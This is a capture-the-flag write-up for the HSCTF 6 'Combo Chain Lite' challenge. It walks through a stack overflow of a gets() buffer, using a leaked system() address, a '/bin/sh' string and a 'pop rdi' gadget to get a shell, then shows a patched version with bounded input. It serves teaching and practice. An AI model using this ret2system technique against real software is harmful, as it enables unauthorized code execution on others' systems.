| Event | Title | Category | Cost |
|---|---|---|---|
| HSCTF 6 | Combo Chain Lite | Binary Exploitation | ~250 |
Written by: Ptomerty
Training wheels!
nc pwn.hsctf.com 3131
Note: If you're trying to use python or a similar program to run your exploit, make sure to keep stdin alive with cat, like this: (python; cat -) | nc pwn.hsctf.com
```
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
```
Simple buffer overflow using the leaked address of system() and the string "/bin/sh" that is already in the binary.
```c
#include <stdio.h>
#include <stdlib.h>

void vuln() {
    char dest[8];                                          /* 8-byte stack buffer */
    printf("Here's your free computer: %p\n", system);     /* leaks the address of system() */
    printf("Dude you hear about that new game called /bin/sh");
    printf("? Enter the right combo for some COMBO CARNAGE!: ");
    gets(dest);                                            /* unbounded read: the overflow */
}
```

We should catch the system() address with a regexp:
```python
import re

# data is the text received from the challenge after connecting
SYSTEM = int(re.findall(r"computer: (.*)", data)[0], 16)
```
Get /bin/sh address from binary:
```
dbg> find 0x400000,0x403000,"/bin/sh"
0x402051
1 pattern found.
dbg> x/s 0x402051
0x402051: "/bin/sh"
```

Count the padding before the return address: 8-byte buf + 8-byte saved rbp = 16 bytes.
And find a ROP gadget to pass the argument to system() (we need a `pop rdi` gadget, because the x86-64 System V calling convention used by gcc passes the first argument in RDI):
```
$ ROPgadget --binary combo-chain-lite | grep "pop rdi"
0x0000000000401273 : pop rdi ; ret
```
That is enough to write the exploit.
Then we run it and get the flag.
```
$ ./exp.py
[+] Opening connection to pwn.hsctf.com on port 3131: Done
Here's your free computer: 0x7fd7b60ba390
[*] Switching to interactive mode
# cat flag
hsctf{wheeeeeee_that_was_fun}
```
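The root cause is the unbounded gets() into an 8-byte buffer plus the pointer leak in the prompt. As an added illustration (not the challenge's source and not part of the original writeup), here is the same function with a bounded read that truncates over-long lines instead of overwriting the saved rbp and return address; the helper name `read_combo` and the `COMBO_LEN` constant are my own.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define COMBO_LEN 8   /* same 8-byte buffer as the original vuln() */

/* Reads at most cap-1 bytes of one line into dest, always NUL-terminates,
 * discards the remainder of an over-long line, and returns the stored
 * length (or -1 on EOF with nothing read). Input longer than the buffer
 * is truncated, so it can never reach the saved rbp or return address. */
int read_combo(char *dest, size_t cap, FILE *in) {
    if (cap == 0 || fgets(dest, (int)cap, in) == NULL)
        return -1;
    size_t n = strcspn(dest, "\n");
    if (dest[n] == '\n') {
        dest[n] = '\0';
    } else {
        /* No newline seen: the line was longer than the buffer. Drain the
         * rest so leftover bytes are not parsed as the next input. */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)n;
}

/* Hardened vuln(): no address leak in the prompt, bounded read of the combo. */
void vuln_fixed(void) {
    char dest[COMBO_LEN];
    printf("Enter the right combo for some COMBO CARNAGE!: ");
    fflush(stdout);
    if (read_combo(dest, sizeof dest, stdin) < 0)
        return;
    printf("Got %zu bytes\n", strlen(dest));
}

int main(void) {
    vuln_fixed();
    return 0;
}
```

With this in place, the 16-byte padding plus ROP chain from the writeup never lands on the stack frame, and the attacker has no system() address to aim at in the first place.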